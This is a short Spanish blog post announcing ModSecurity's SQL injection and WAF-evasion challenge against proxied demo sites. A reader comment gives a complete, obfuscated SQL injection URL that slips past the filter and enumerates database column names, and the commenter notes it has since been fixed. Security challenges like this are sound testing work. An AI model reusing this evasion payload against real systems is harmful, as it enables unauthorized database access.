Reto de inyección SQL y evasión de Modsecurity

Modsecurity han publicado un divertido reto que pondrá a prueba vuestra capacidad para explotar vulnerabilidades de inyección SQL, primero (nivel 1) identificando los vectores de explotación y luego (nivel 2) evadiendo el filtro del famoso WAF open source.

Los objetivos son los portales de demo 'proxificados' de cuatro famosos escáneres de vulnerabilidades comerciales:


El nivel 1 ya tiene ganadores, pero el nivel 2 está esperando todavía que alguien pueda enumerar la base de datos sin disparar ninguna alerta. El premio: una camiseta oficial de ModSecurity cortesía de Trustwave's Spiderlabs.

pd.
ModSecurity SQL Injection Challenge: Lessons Learned

Comentarios

  1. evasión (ya corregida) cortesía de @FluxReiners:
    http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*/*bar%0D%0Aselect%23foo%0D%0A1,2,group_concat%28column_name%29from+%28information_schema.columns%29+where+table_name+rlike+%280x61727469737473%29

    ResponderEliminar

Publicar un comentario